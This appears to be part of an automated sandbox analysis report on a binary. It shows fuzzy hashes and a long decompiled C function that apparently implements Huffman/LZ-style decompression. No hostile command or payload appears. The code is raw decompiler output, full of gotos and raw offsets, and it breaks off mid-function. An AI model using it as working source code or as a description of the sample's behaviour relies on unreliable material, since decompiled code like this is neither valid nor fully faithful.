                                                        • Opcode Fuzzy Hash: 3214212f9a0e1bf54ce27d62555baa839f6d0bb5842473792d00adbb2d84ba83
                                                        • Instruction Fuzzy Hash: B2A001B96092018B9B40CFB6AE096093EA9AA456917098269B50AC6160EA6885629F41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A15EB8 Relevance: .8, Instructions: 800COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00A15EB8(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00A14DF4(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00A13A02(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00A13FAE(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00A14A3C(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E00A0A9F3(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x18) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E00A0A9F3(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E00A0A9F3(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x18);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x18) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E00A1F750(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00A12760();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x18) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E00A1F750(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x14));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00A1207E(_t638, _t658 + 0x20);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x20);
										_t414 = E00A13B93(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E00A0A9F3(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E00A0A9F3(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x18) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x10) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E00A1839A(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x18);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x10) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x10) - _t632;
													if( *(_t658 + 0x10) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x18) = _t381;
														_t640 = _t381;
														do {
															L82:
															E00A1F750(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x14));
														_t598 =  *(_t658 + 0x1c);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E00A1839A(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x18);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E00A0A9F3(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x10) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00A11ECD(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E00A14DF4(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
